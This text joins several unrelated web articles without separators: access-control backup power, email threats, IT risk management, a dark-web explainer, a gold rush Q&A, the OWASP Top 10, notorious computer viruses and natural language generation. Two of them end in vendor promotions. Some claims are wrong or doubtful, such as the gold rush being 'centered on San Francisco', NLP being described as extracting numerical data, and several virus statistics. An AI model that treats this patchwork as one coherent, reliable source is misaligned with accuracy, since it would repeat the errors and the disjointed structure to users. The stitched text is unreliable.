While it's often necessary to have a backup power supply, it's important to know what the legal requirements for that supply are, if any. Here are some helpful articles for determining whether you need backup power. In summary, you need backup power for essential functions like ventilation and lighting, but as long as there is a clear means of exiting, you don't legally need backup power for access control. Fire marshals will check for this last point in their inspections. It seems rather obvious that you'd need a way of exiting the building even when there is no power. This is often provided by emergency push bars on doors, but it can also be provided by electric locks, as long as you have reliable backup power in case of an outage.

Backup Power Methods

We'll now go through what you can do to ensure that your office is adequately prepared with backup power.

Building Backup Power

First, check that the building has a backup generator. This is a baseline requirement, but in some situations it may be enough to guarantee that your office is covered. Confirm what the allocation of power is and that your office, with all its uses, can be sufficiently supplied. If the building's backup is sufficient, you're good! If not, you'll want a backup battery or a smaller generator for your office, or for each lock. As a general rule of thumb, a backup battery should be able to supply power for 24 hours, so you'll need to know the power consumption of each lock and reader and extend that over a 24-hour day. This requires a bit of math, but it's totally doable (a short sketch follows), and then you will be prepared should the worst happen.
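As a hedged illustration of that math, here is a minimal battery-sizing sketch. The device wattages, the 12 V battery voltage, and the 20% safety margin are assumptions for the example; use your actual hardware's rated draw and your battery's real voltage.

```python
# Hypothetical power draws in watts (check your own hardware's ratings).
devices_watts = {
    "controller": 6.0,
    "reader_front_door": 2.5,
    "reader_back_door": 2.5,
    "maglock_front_door": 12.0,
}

HOURS = 24            # rule of thumb from above: 24 hours of runtime
BATTERY_VOLTS = 12.0  # common backup-battery voltage (assumption)
MARGIN = 1.2          # 20% headroom for battery aging and conversion losses

total_watts = sum(devices_watts.values())
watt_hours = total_watts * HOURS
amp_hours = watt_hours / BATTERY_VOLTS * MARGIN

print(f"Total draw: {total_watts:.1f} W")
print(f"Energy over {HOURS} h: {watt_hours:.0f} Wh")
print(f"Suggested battery capacity: {amp_hours:.0f} Ah at {BATTERY_VOLTS:.0f} V")
```

With these example numbers, a roughly 55 Ah battery at 12 V would cover a day-long outage; rounding up to the next commercially available size adds further headroom.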
Dedicated Office Backup

In the IT world, most backup power is provided by a UPS, an uninterruptible power supply. Here is a guide to the better options out there. If your business relies on connectivity, you simply can't afford to lose power, because lost power means lost internet and, by extension, lost productivity. That means that IP systems like Kisi can and should always be connected through the UPS. If you'd like to read more about this, and learn about a particular case study, check out this article on the Kisi page.

(Example of a popular UPS by the company APC)

Power supplies for access control systems can take different forms:

- A simple low-voltage power adapter
- A power panel for low-voltage access control

Depending on the size of your access control setup, you might have a larger or a more minimal power supply. It is worth checking what happens when the power is out: normally the building should have a backup power generator, but make sure to double-check.

Power supply for access control

Altronix is by far the most popular power supply manufacturer. Depending on how much security equipment you want to power, you'd need a different strength of power supply. A good example is a 24V low-voltage Altronix power supply that is also UL listed for access control. Kisi's opinion: make sure the power supply is CE rated, and stay away from no-name power supplies!

Power supply panel for low-voltage access control

Power supplies are an often overlooked part of the access control system. They need to be rated to deliver enough voltage and current to the access panel and the locks. Kisi's opinion: typically, more professional power supplies can power more locks and have separate power relays to provide surge protection. Commercial power supplies often come with a function input that allows better wiring of the product. Here is a wiring diagram of how a magnetic lock is wired to a power supply and the Kisi controller.

Losing power in your office is a pretty big deal. Given our reliance on electric and digital appliances, many basic functions that we take for granted are affected, not least modern access control: your locks and readers need power to function. Thankfully, many options exist for ensuring backup power, and you'll want to make sure that you're covered in case of an outage. Modernize your access control with remote management and useful integrations.
Email security refers to the measures an organization takes to secure the various aspects of its email system, such as identity, content, media attachments, and email access. Email can also be described as a central repository, and therefore a central point of attack, for hackers. It can be targeted by phishing attacks, identity theft, spam, and viruses.

Email is frequently an intruder's gateway into an organization, and with over 215.3 billion business and consumer emails received daily, it represents a dangerous opportunity for unscrupulous entities. Data breaches are a large concern for businesses today, as the number of attacks keeps growing year over year. The purpose of an attack on email is either to use it as a pathway to a larger data breach or to breach the email account itself.

Types of Email Attack

Hackers use different attack vectors to target email systems. While different attack vectors may employ different methods, each has a specific purpose when executing the attack. The most common techniques used to attack email include identity theft, phishing, viruses, and spam. Let us take a closer look at each.

Identity Theft

Many organizations these days use Microsoft Office 365, G Suite, Zoho, or similar services to manage their email systems. Beyond hosting email, services like these offer a suite of useful business tools to manage information in one place, including added cloud storage space, project management and collaboration tools, an office suite, and much more. Since these apps are all part of the same suite as the email service, end users do not need a separate set of login credentials to access them.

Regardless of whether a company uses the above-mentioned services or its own proprietary service, the consequences are the same when a hacker gets hold of a user's identity (i.e., login credentials). Employees usually use the suite to store confidential data, which will quickly be exposed if an attacker gains a handle on the employee's email account. Email identity theft can have much bigger consequences than it did a few years ago.

Phishing

Phishing is one of the fastest-growing attack vectors. For hackers, it is a tried and tested method that has worked for more than a decade; in fact, more than two decades have passed since the first reported phishing attack in 1995. As the internet grew, so did the number of users with at least two email accounts, giving hackers far wider reach than ever before. According to a report by Tripwire, there were 9,576 phishing incidents recorded in 2015, with 916 of them reporting a breach of data.

Phishing employs several different techniques, each with its own target audience and purpose. In an attack called pharming, the hacker changes the IP address associated with a website, redirecting users to a malicious site even though they entered the correct domain name in the URL. Deceptive phishing scams users by posing as a legitimate website and scaring them into paying money. Spear phishing applies the same deception to specific, researched targets, with the aim of making them hand over their personal data. According to a report by Symantec, spear-phishing campaigns targeting employees increased 55% in 2015.
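Since both deceptive and spear phishing lean on lookalike sender domains, here is a minimal, hedged sketch of one common countermeasure: flagging addresses whose domain is suspiciously close to, but not exactly, a trusted one. The trusted-domain list is an assumption for the example, and real mail filters combine many more signals (SPF, DKIM, sender reputation) than this.

```python
from difflib import SequenceMatcher

TRUSTED_DOMAINS = {"example.com", "examplebank.com"}  # assumed allow-list

def domain_of(address: str) -> str:
    """Return the domain part of an email address, lowercased."""
    return address.rsplit("@", 1)[-1].lower()

def is_lookalike(address: str, threshold: float = 0.8) -> bool:
    """Flag domains that are similar to, but not exactly, a trusted domain."""
    domain = domain_of(address)
    if domain in TRUSTED_DOMAINS:
        return False  # exact match: trusted
    return any(
        SequenceMatcher(None, domain, trusted).ratio() >= threshold
        for trusted in TRUSTED_DOMAINS
    )

print(is_lookalike("billing@examp1ebank.com"))  # True: one character swapped
print(is_lookalike("friend@unrelated.org"))     # False: not close to any trusted domain
```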
Viruses

Attacking with a virus delivered over email is another way of using email as a vector. Creating a virus and deploying it requires meticulous planning, an activity more likely to be conceived and executed by a group than by an individual. A targeted virus can have one specific purpose or several; regardless, the email itself is rarely the target, merely the first stage of the attack. If the attack is successful, the virus can spread across the network in a short time and may even be able to shut the entire network down.

Even the simplest virus will attempt to lure the end user into downloading an attachment. Masquerading as documents, these are in fact files which, if executed, could take control of the host or lead to the consequences mentioned above. In a 2015 report, Kaspersky Lab's web antivirus detected 121,262,075 unique malicious objects: scripts, exploits, executable files, and more.

Spam

Spam is the most commonly known form of email attack, perhaps because we all have a "spam" folder in our email accounts where unwanted or unsolicited emails land. This is likely why even people from non-IT backgrounds know what spam is, although it is usually thought of as merely harmless email that can be deleted without even being opened. It is true to some extent that some of those emails really are harmless from the end user's perspective. Spam has risen in the last couple of years with the growth of social media and e-commerce websites; companies, for example, usually broadcast their latest news or announcements over email to large numbers of people on an opt-in list.

However, with the right kind of planned attack, spamming could prove fatal for companies, if not for users. If a hacker gains control of an organization's email, they can send unsolicited emails to even larger numbers of people. Worse, since the emails go out from legitimate addresses, hackers can take advantage of the situation and send emails carrying a phishing attack or a virus attachment, infecting large numbers of users simultaneously. The company, on the other end, could face serious consequences, such as being questioned by the governing authorities over the spam. It risks having its internet connection shut down by its internet service provider, which can bring the company's operations to a complete halt.

It is always prudent to be careful when using email these days, especially in a professional environment. Email is still a very secure means of communication, provided you keep an alert eye out for emails asking you to perform activities such as clicking, downloading, or updating. When in doubt, it's always safer to ask for a second opinion.
IT risk management allows organizations to prepare for some of the most costly risks they'll face: every threat presented by devices, applications, and the internet. Successful risk management requires risk and IT teams to work together frequently, and it is most beneficial when organizations use software to organize their entire approach to risk.

What is IT risk management?

Information technology risk management is a specific branch of risk mitigation, prioritization, and optimization that focuses on the probabilities and threats that come from enterprise hardware, software, and networks. Focus areas of risk management include:

- Mitigation — enterprises work to lessen the negative impact of problems that have already occurred
- Prioritization — enterprises decide which risks are most important to handle and which are less critical
- Optimization — enterprises discover which risks are worth taking so they can reap the benefits if the risks pay off

Typically, enterprises create a risk management plan (often known as a GRC framework or a business continuity plan) that involves multiple company stakeholders. Enterprises often use a software platform to digitally track risks; the application alerts them when a new threat arises and shows their progress toward compliance with any regulatory standards.

Also read: How to Meet Regulatory Compliance

What are common IT risks?

Examples of IT risks include employee mistakes, software vulnerabilities, and network and device failures.

Employee mistakes

Employee mistakes are responsible for around 85 percent of data breaches, according to The Psychology of Human Error study conducted by Stanford University and security firm Tessian. These errors include clicking links in emails that download malware onto a device, failing to use a variety of strong passwords, or accidentally giving away company information through a phone call or text.

Hardware failures

Eventually, servers grow old, laptops die, and storage disks fail. This becomes a risk when the data on that hardware isn't backed up and when an organization isn't prepared to replace the devices. An unexpected server failure can be catastrophic if the server was running high-performance applications with no way to automatically move them to another server. Storage system failure puts sensitive customer information at risk of loss; it also means the organization could become noncompliant with data regulations.

Network or web server outages

If either the company Wi-Fi network or a data center network goes down, the business loses precious operational time, and it could also lose sales deals. If a network outage causes a user-facing application to pause, customers won't be able to access it. The same goes for web servers: if they go down, the website goes down too. This affects not only a business's sales but also its reputation.

Network and data breaches

Security breaches aren't the only IT risks an enterprise faces, but they're among the hardest to recover from. Some types of malware embed themselves so deeply into a company's IT infrastructure that even reinstalling a system won't automatically rid it of the malicious code.

Also read: Data Breach Cost Reaches All-Time High

How does IT risk management work?

Enterprises typically use IT risk management software to centralize and organize their approach to protecting these sectors of the business.
User access to both networks and accounts

Access risks include attackers breaching the company network, information compromise and theft, and malicious software attacks. IT risk management solutions alert administrators when an unauthorized user attempts to access a system or when network traffic resembles a common security threat.

Data protection and compliance

Data risks include exposing customer data, being noncompliant with data protection regulations, and having an entire storage system breached. An IT risk management platform keeps records of each step toward compliance, tracking an organization's progress and sending alerts to the stakeholders that have compliance tasks assigned to them. It also prioritizes threats, like a storage breach, that the business should address.

Third-party software and integrations

Any software that's linked to another program has at least limited ability to interact with it. This is another vector for attackers to breach a network, especially if the third-party application has unpatched vulnerabilities. With the right credentials or backdoor access, attackers could potentially move from a third-party application to the primary application and gain full control of it. IT risk management software offers tools like third-party vendor assessments to gauge how secure a vendor's platform is.

Also read: Best Risk Management Software

Why is IT risk management important?

Between third-party management and compliance regulations, data protection and networks, IT risk management covers every danger that technology presents to an enterprise. As enterprises undergo digital transformation and shift to remote workforces and applications, they need a centralized plan to manage their IT resources safely.

IT risk management provides a framework for businesses to track every threat presented by devices, networks, and human users. The software that enterprises use records risks and ranks their importance, detailing how critical a risk is to business operations and alerting the employees who are responsible for handling it. Without managing information technology and security risks, businesses will rapidly become swamped with compliance tasks, security threats, and endpoint device management, and they'll be unable to organize their responses to risk.

How to implement IT risk management

To develop a risk management strategy specific to information technology, approach IT management with team collaboration at the forefront. Be prepared for enterprise IT risks to scale as your enterprise grows, too: the more employees and device users the business gains, the more internal security threats increase.

Ensure risk and IT teams work together

An important part of risk management is decreasing silos. If your enterprise has a risk team and an IT department, they'll need to collaborate to set up a successful IT risk management strategy. Working together makes these two teams more aware of technology threats and better able to prioritize the ensuing risks. For example, if a storage system is breached, IT or infosec teams will discover patterns within the attack and share all relevant information with the risk team.

Both teams offer insights that the other needs, according to Joel Friedman, the CTO and co-founder at risk management provider Aclaimant. "Risk managers and IT teams can work in tandem to boost risk management awareness across their business and also ensure all stakeholders can use this technology to its greatest potential," said Friedman.
"While most risk managers are inherently experts in risk and not technology, they can lean on their IT counterparts to boost adoption and understanding of the technology and data that will help them do their jobs more effectively. On the flip side, IT teams should also consider incorporating risk management into their processes, as any technology presents not only opportunities but also potential risks to the overall business."

Risks and information technology are so closely entwined that it's nearly impossible, and unwise, to keep them separate. Organizations that recognize the dangers inherent in IT, and the consequences those dangers have for enterprises, will be better prepared to manage tech- and security-related risks.

Prepare for insider risk

Many IT risks come from the employees within the organization, but enterprises don't pay enough attention to the role their own workers play in creating risk, according to Jadee Hanson, the CIO and CISO at data protection company Code42. The three Ts — transparency, training, and technology — help enterprises manage those risks.

"A significant aspect of IT security risk management that is commonly (and mistakenly) neglected is insider risk," said Hanson. "First, you want to have a transparent security-centric culture that prioritizes data protection at every level. Leaders should work with the cybersecurity team to produce well-thought-out protections on data use, handling and ownership, which can be delivered to their employees, contractors, vendors, and partners."

Collaboration is critical to developing a risk management strategy, and that includes informing employees of all the risks related to them. "Employees need to be properly trained on the business impact of their data exposure actions with security and awareness training from initial on-boarding through off-boarding. Gone are the days of hour-long training with no relevance to the work that employees are doing. To address these data exposure issues, we need point-in-time training that occurs right after data exposure events happen," Hanson said.

Lastly, monitoring and detection tools reveal which regions of the IT infrastructure have been compromised. "Having a technology solution in place that gives security teams visibility to data moving off endpoints to untrusted cloud destinations, personal devices, and personal emails is key," Hanson explained. "Today, most (71 percent) security teams lack visibility into what and/or how much sensitive data is leaving their organizations. Without technology providing the right visibility, it's nearly impossible for security to focus on the right protections and mitigate the overall data exposure risk."

Prepare your strategy for organizational scaling

A successful IT risk management strategy must be able to grow with the company; otherwise, it will need to be reworked regularly. A better approach than redesigning the strategy each year, especially if your organization is in a period of rapid tech growth or change, is to develop a scalable risk management plan, according to Vasant Balasubramanian, VP and GM of the risk business unit at ServiceNow.

"The need to 'plan for scale' is due to the explosion of technology in every phase of the business: the pace of change, range of threats, growth of suppliers, and more," Balasubramanian said. "To compound the problem, IT teams are not able to add people at the same rate as the need is growing. Therefore, first and foremost when implementing an IT risk management strategy, you should design the program with scalability in mind.
"This is a journey that cannot be accomplished overnight, but the planning for scalability must be in place up front to achieve the desired maturity over time. Only then can organizations stop the cycle of recreating IT risk programs every few years."

Examples of planning for scale include:

- Setting up an analysis plan for new technology, so the IT risk management team can vet every new application or tech advancement for potential risks and rewards
- Choosing risk management software your business will still be able to use in a few years, especially if the organization grows substantially
- Building a collaborative IT and risk management team that persists regardless of who leaves or joins the company, and preparing to move new employees into those roles

Successful IT risk management strategies must be built on collaborative, transparent processes between technology teams and risk managers. They must also account for the many threats that employee errors pose, and prepare for the business to grow rapidly, as growth can accelerate both IT and human risks.
What Is The Dark Web?

You may have heard that businesses and individuals suffer tremendous losses when their information gets stolen and later turns up on the Dark Web. Can this happen to you, and is this a genuine threat you need to investigate further?

Is The Dark Web Fact or Fiction?

The online world is filled with tall tales, horror stories, fiction, and fantasies. But there is one area, not seen on the surface and lurking in the shadows, known as the Dark Web. Its very name has a sinister sound that instills deep fear and caution and brings great concern for IT service providers. Or is this just another internet prank being played on all of us?

What is the Dark Web?

The Dark Web resides on a part of the internet that does not get indexed by search engines. It is indeed a real location on the internet, but its visibility to search engines is hidden and its users are anonymous. To journey into the dark web, don't expect your regular internet browser to work: you have to use an anonymizing browser known as Tor, short for The Onion Router.

What is a Tor Browser?

According to CSO Online contributor Darren Guccione: "The Tor browser routes your web page requests through a series of proxy servers operated by thousands of volunteers around the globe, rendering your IP address unidentifiable and untraceable. Tor works like magic, but the result is an experience that's like the dark web itself: unpredictable, unreliable and maddeningly slow." (Source: CSOOnline.com)

What Takes Place on the Dark Web?

The dark web primarily hosts criminal activity. If you have access and a means to pay, you can buy usernames, passwords, and credit card numbers, as well as hacked bank accounts and software that lets you break into other people's computers. But there are other areas of the dark web where individuals go to play chess and socialize online, such as BlackBook, the Facebook of Tor.

Where On The Internet is the Dark Web?

To answer that, you must first understand that the internet is the backbone, and the Web is just one way of swapping information and data over it. Overall, the web has three sections:

- Surface Web – the section where all web-based content gets found by search engines
- Deep Web – the section that search engines will not find
- Dark Web – the section that is not found by search engines and whose users remain anonymous through anonymizing software

Why Is This Important To Know?

Knowing the difference between the three sections gives you a clearer basis for planning and building proactive and reactive cybersecurity programs. By understanding the differences, you and your management team can determine the right course of action: either remediate an incident, or identify information belonging to your organization if it has indeed been compromised and leaked.

How To Ensure Your Data Stays Off The Dark Web?

There's only so much you can do by yourself to protect your company's information. When you contact Compunet InfoTech, we have more direct ways to examine your data. Our Dark Web ID solution can quickly uncover compromised credentials that may show up on the dark web. It is another level of high-end data theft protection, keeping you and your information safe.

Contact Compunet InfoTech's team of experts to assist with all your security needs. Click here or call (604) 986-8170 to get in touch with our representatives.
What event in 1849 attracted prospectors and settlers to the boomtowns of the American west?

The California gold rush of 1849, centered on San Francisco.

The gold rush drew prospectors and settlers to the boomtowns of the American west. The discovery of gold in California triggered a massive influx of people to the western United States, as prospectors and settlers rushed to strike it rich in the newly found gold mines.

As news of the discovery spread, thousands of people from all over the country, and even from other parts of the world, flocked to California in search of fortune. The promise of wealth and opportunity lured individuals from diverse backgrounds, creating a melting pot of cultures and ethnicities in the boomtowns that emerged in the American west.

The gold rush not only shaped the landscape of the west but also had a lasting impact on the region's social and economic development. It led to the rapid growth of towns and cities, the establishment of mining communities, and the emergence of new industries to support the influx of fortune-seekers.

Overall, the gold rush of 1849 was a transformative event that forever altered the course of American history, leaving behind a legacy of opportunity, challenge, and resilience that is still remembered and celebrated today.
Ensuring web application security is important for both businesses and developers. The OWASP Top 10 list is a crucial guide that highlights the most common and pressing cybersecurity hazards today. Professionals should get to know these vulnerabilities, draw insights from the list, and follow its guidance to secure web applications against common threats.

What Is the Purpose of the OWASP Top 10?

The OWASP Top 10 is an extensive report that identifies major web application security risks for organizations. The Open Web Application Security Project (OWASP) and security experts worldwide continually update this compilation to reflect new cybersecurity risks. As of this writing, the latest version is the OWASP Top 10 2021 issue.

The OWASP Top 10 primarily aims to educate developers, security professionals, and organizations about common security weaknesses in applications, so they can take proactive steps to strengthen their defenses. Understanding the OWASP Top 10 is essential for anyone involved in the development and deployment of web applications: the report serves not only as a guideline for identifying and addressing security risks, but also as a framework for implementing modern security measures. By knowing its contents, stakeholders can significantly reduce the risks that come with public exposure.

What Are the Most Prevalent Types of Attacks Targeting Web Applications?

The list is vast, and includes flaws in categories such as broken access control and broken authentication. These flaws make it possible to attack insufficiently protected systems, enabling unauthorized entry and data breaches. Online attackers also treat security misconfigurations, such as default or incomplete settings, as an opportunity. Apps that reveal confidential information are another concern addressed by the OWASP Top 10, since they can let personal data such as names, financial details, or login credentials fall into criminal hands.

Through proactive measures, the OWASP Top 10 breaks down web application security and emphasizes the need to stay on top of it. The list is a wake-up call for organizations to prioritize application security risk and address these vulnerabilities with urgency:

1. Injection Attacks: In SQL injection attacks, an attacker attempts to execute malicious SQL statements by inserting them into an input field of an application. This attack targets the databases that the application uses to store, retrieve, and manipulate data. Through a SQL injection attack, an attacker can gain access to the database and view, modify, delete, or even create data. (A short parameterized-query sketch after this list shows the standard defense.)

2. Broken Authentication: Broken authentication attacks refer to security vulnerabilities and exploits where attackers target weaknesses in the authentication and session management processes of a web application or system. Authentication is the process of verifying the identity of a user, device, or entity, typically through credentials such as usernames and passwords. When authentication mechanisms are improperly implemented or configured, attackers can exploit the flaws to impersonate legitimate users and gain unauthorized access to sensitive areas of the application or to user data.

3. Sensitive Data Exposure: Failure to adequately protect sensitive information, such as financial data or personally identifiable information (PII), can lead to data breaches, regulatory penalties, and reputation damage.
These vulnerabilities can also carry legal consequences under legislation such as the GDPR (General Data Protection Regulation) in Europe and HIPAA (the Health Insurance Portability and Accountability Act) in the US, among others around the world.

4. XML External Entities (XXE): XXE attacks are a type of security vulnerability targeting applications that parse XML input. The vulnerability occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. External entities in XML can be used to define external resources by URI (Uniform Resource Identifier). If an XML parser is improperly configured to process these entities without proper restrictions, an attacker can exploit this feature to conduct various malicious activities.

5. Broken Access Control: Broken access control refers to weaknesses in a web application or system that allow unauthorized users to access resources, or perform actions on them, that they should not be able to. Improperly implemented or configured access control lets attackers bypass these restrictions and gain unauthorized access to sensitive data or functionality.

6. Security Misconfigurations: Security misconfigurations constitute one of the most common yet preventable vulnerabilities in IT systems and applications. Attackers can exploit the gaps left when security settings are improperly defined, implemented, or maintained. Misconfigurations can stem from a wide range of oversights, such as unnecessary services running on a system, default accounts with unchanged passwords, unnecessary user privileges, or improperly exposed data.

7. Cross-Site Scripting (XSS): These attacks are a type of injection vulnerability typically found in web applications. XSS enables attackers to inject malicious scripts into content that appears to come from a trusted source. The malicious script executes when a user views the content, potentially compromising the confidentiality, integrity, or availability of the user's data or the application's functionality.

8. Insecure Deserialization: Insecure deserialization attacks occur when an application deserializes data from untrusted sources without sufficient validation, which can lead to the execution of malicious code, denial of service (DoS) attacks, or other unintended consequences. Serialization converts an object into a format suitable for storage or transmission; deserialization converts the stored or transmitted data back into an object.

9. Use of Components with Known Vulnerabilities: When third-party components in applications are not updated or patched, attackers can exploit known issues and potentially compromise the system. Examples of this threat are the Log4j vulnerabilities in late 2021, the XZ Utils backdoor in 2024, and WAF bypass attacks.

10. Insufficient Logging and Monitoring: Poor logging and monitoring capabilities hinder detection efforts and delay incident response, amplifying the effects of security breaches.

These top ten web application security risks highlight the significance of a proactive approach to maintaining the integrity of digital assets against evolving threats.
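As promised under item 1, here is a minimal sketch of the standard defense against SQL injection: parameterized queries, shown with Python's built-in sqlite3 module. The table and data are assumptions for the example; the point is that user input is passed as a bound parameter rather than spliced into the SQL string.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

user_input = "alice' OR '1'='1"  # a classic injection attempt

# UNSAFE pattern (shown only as a comment): string formatting splices
# attacker-controlled text directly into the query.
# query = f"SELECT email FROM users WHERE name = '{user_input}'"

# SAFE: the ? placeholder sends the input as data, not as SQL.
rows = conn.execute(
    "SELECT email FROM users WHERE name = ?", (user_input,)
).fetchall()
print(rows)  # [] -- the injection attempt matches no user
```

The same placeholder pattern, with syntax varying by driver, applies to any database library.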
What Resources and Tools Does OWASP Offer for Improving Web Application Security?

OWASP provides numerous tools and resources to help organizations fight web application security threats. These offerings aim to help organizations understand, identify, and mitigate risks to information safety and confidentiality. They include comprehensive guidelines and documentation alongside open-source tools for developers, resources that sharpen practitioners' ability to guard against the weaknesses addressed in the OWASP Top 10.

The availability of these materials reflects OWASP's commitment to improving web application security. With their help, security testers can perform thorough evaluations of a system's defenses, and anyone who wants their applications to be resilient against attack can benefit.

What Are the Best Mitigation Strategies to Fight Cybersecurity Threats?

Dealing with the risks disclosed in the OWASP Top 10 requires a combined effort. Implementing proper access controls to prevent unauthorized access and ensuring strong authentication mechanisms are critical measures. Regularly updating and patching software is another important step in safeguarding web applications, and adopting a "security first" approach helps developers reduce coding errors.

Another effective way of mitigating security risks is a Web Application Firewall (WAF). A WAF can protect APIs and applications by blocking malicious traffic coming from the internet. By following these steps, organizations can position themselves better against cyberthreats, safeguard personally identifiable information (PII), and maintain user trust.

Some other effective mitigation strategies include:

- Applying safe coding practices and input validation to prevent injection attacks and XSS vulnerabilities (a short output-encoding sketch follows this list).
- Using strong authentication mechanisms alongside sound session management routines to prevent unauthorized logins and account takeover.
- Encrypting sensitive data in transit and at rest to reduce the likelihood of information leaks.
- Regularly updating software components to fix known vulnerabilities and misconfiguration issues.
- Proactively identifying and remediating security weaknesses in software systems through penetration testing, code reviews, and periodic security assessments.
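To ground the safe-coding bullet above, here is a small hedged sketch of output encoding, the standard defense against the XSS risk described in item 7. It uses Python's built-in html module; the comment-rendering function is a hypothetical example, and in practice a templating engine with auto-escaping would usually handle this for you.

```python
import html

def render_comment(author: str, comment: str) -> str:
    """Build an HTML fragment, escaping user input so it renders as text, not markup."""
    return (
        f"<p><strong>{html.escape(author)}</strong>: "
        f"{html.escape(comment)}</p>"
    )

malicious = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
print(render_comment("mallory", malicious))
# The <script> tag is rendered inert: it appears in the page as literal text
# (&lt;script&gt;...) instead of executing in the victim's browser.
```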
Computer viruses are damaging and costly to businesses. Statistics show that approximately 21% of companies in Canada were affected by cybersecurity incidents in 2017. Businesses also spent about $14 billion on preventing, detecting, and recovering from cybersecurity issues in the same year. As the world becomes more internet-connected, new pieces of malware are discovered every day, with the cost of damage amounting to over $55 billion. While this figure accumulates from the damage caused by many strains of malware, three computer viruses stand out as the most notorious.

The impact of the ILOVEYOU virus and the vulnerabilities it exposed can still be felt more than 20 years later. Tens of millions of computers were affected worldwide, and the resulting damage amounted to close to $10 billion. So bad was the damage that governments and large corporations had to take their mailing systems offline for a while to prevent infection.

Although its creators were in the Philippines, the virus was first widely detected in Hong Kong, at a time when the internet was still relatively new to the world. Statistics show that only about 28% of people in Hong Kong had access to the internet, 27% in the United Kingdom, 15% in France, and 43% in the United States, where the technology was invented. Spreading from Hong Kong, the virus brought down communications and destroyed file systems. Affected companies included investment banks, the Dow Jones newswire, and public relations firms. Two Filipino programmers, Onel de Guzman and Reonel Ramones, were behind the creation of the virus.

Social Engineering at Work

In this case, the hackers used a love confession. The email's subject line was "ILOVEYOU," and the message was "kindly check the attached LOVELETTER from me." Recipients, thinking the email was a joke or a declaration of love from someone, opened what seemed to be a text file. In reality, it contained an executable program. The virus quickly took control and replicated itself, spreading to many people. Within minutes, it clogged office email servers and destroyed victims' hard drives, corrupting and deleting thousands of files.

At the time, there were no laws against malware, and the culprits were never charged. However, it was around this time that the E-Commerce Law was enacted to deal with the problem.

Mydoom is probably the worst computer virus outbreak that ever happened. It took place in 2004, causing damages of approximately $38 billion, an inflation-adjusted cost of about $52.2 billion. The virus, also known as Novarg, is technically a worm that spreads through mass emailing. At one point during its attack, it was responsible for 25% of all emails sent.

The damage began with the scraping of email addresses from infected computers. The worm then replicated itself by sending copies to every address it could find. Further, it roped the affected devices into a network of compromised computers, resulting in what is known as a botnet. This enabled the attackers to launch distributed denial-of-service (DDoS) attacks, which would shut down the targeted websites or servers.

Mydoom is still a common virus today, working behind 1% of all phishing emails. Given that over 3.4 billion phishing emails are sent daily, it's undeniable that the virus remains a significant force with a life of its own. It still infects poorly protected machines, sending out 1.2 billion copies of itself, 17 years after its creation.

The financial costs of the Code Red virus are approximately $2.4 billion. It hit in 2001 and managed to penetrate about 975,000 hosts running Microsoft's IIS web server. This corporate software program contained a security hole that cybersecurity experts had not yet addressed. The virus endangered global internet performance, warranting an FBI warning.

Upon investigation, the virus was traced to a university in China. It had already infected over 300,000 computers before reaching the White House website. Some speculated that the hackers gave the virus the Code Red name as a covert reference to China. However, reports from the U.S. said that the name came from an American soft drink popular among computer programmers.

China was on the front line of inquiry, as some infected machines displayed the words "Hacked by Chinese." On the other hand, the wording could have been a red herring to divert attention from the actual origin of the virus. According to a Chinese government spokesman, the country knew nothing about the worm. Microsoft later released a patch to fix the security hole. It also joined the FBI in encouraging users to make sure their systems were safe against Code Red.

Many other viruses have caused immense damage over the years. The financial impact of these viruses was enormous, but they are just the tip of the iceberg. Companies are at risk of being attacked by the more than 127 million new malware apps that hackers create annually. As such, cybersecurity measures are of paramount importance for all business operations.

Computer viruses come in many forms today, including file infectors, email viruses, Trojans, browser hijackers, adware, and macro viruses. They are unwelcome predators that put your business reputation at stake when they strike. They could also bring your business down, depending on the extent of the attack.

Since you never know when such an attack could happen, it's crucial to take protective measures. Experts recommend keeping all your systems and applications updated at all times; this helps patch the security holes that open the way to an attack. Put measures in place to monitor emails, use firewalls, install antivirus, anti-ransomware, and anti-malware software, and encrypt your files and folders. You must also create cybersecurity awareness among your employees and customers, educating them on the risks and warning signs.

Ensuring that you have comprehensive cybersecurity measures calls for professional input. Working with an IT service provider gives you better results than doing it all on your own. EB Solutions is one such company that customizes your IT solutions to meet your business needs. Contact us today, and let's review your business IT systems and cybersecurity needs.
Natural language generation (NLG), a form of generative AI, is an AI-driven technology that transforms structured data into human-like narratives. These narratives convey complex insights and serve as the foundation for the automated generation of various forms of content, including reports, articles, and summaries derived from intricate datasets.

NLG transforms data into human-readable text, while natural language processing (NLP) focuses on extracting numerical data from textual sources. NLG streamlines the comprehension of numerical data by generating reader-friendly summaries, eliminating the need for extensive manual data analysis. In contrast, NLP reads and extracts critical numerical insights from human-written text, efficiently summarising research findings. In simple terms, NLG acts as a writer, while NLP functions as a reader in data interpretation.

NLG operates through an intricately designed framework composed of core components. At its genesis, NLG relies upon structured data, encompassing numerical values, chronological data, factual information, and assorted data points of relevance. NLG then deploys advanced algorithms to process and analyse the underlying data meticulously; these algorithms unveil meaningful patterns and critical insights concealed within the dataset. Next, NLG harnesses predefined templates and a structured set of rules to systematically shape the generated text, ensuring textual consistency and readability. Finally, the language generation engine is the central component responsible for transmuting the insights derived from data into meticulously structured and coherent narratives. This transformation is achieved by applying linguistic rules and patterns, ensuring the final output retains the attributes of human-generated text.

The practical applications of NLG span diverse domains. NLG brings unprecedented efficiency to reporting by autonomously generating comprehensive reports and concise summaries, alleviating the considerable time and manual labour typically associated with these tasks. It is also a transformative force within business intelligence, translating raw data into actionable insights that guide real-time decision-making. And it integrates seamlessly with conversational interfaces, such as chatbots and virtual assistants, to provide context-aware and personalised customer support, substantially enhancing the quality of user interactions.

The integration of NLG within an organisational framework furnishes an array of distinct advantages. NLG bridges the comprehension gap between complex data and actionable insights, expediting the decision-making process while minimising the risk of errors stemming from manual interpretation. Its scalability empowers organisations to effortlessly process voluminous datasets, extending the automation of report generation and content creation to a grand scale. Finally, NLG ensures uniformity in reporting and messaging, mitigating the risk of human errors, inconsistencies, and omissions that often plague manually generated content.

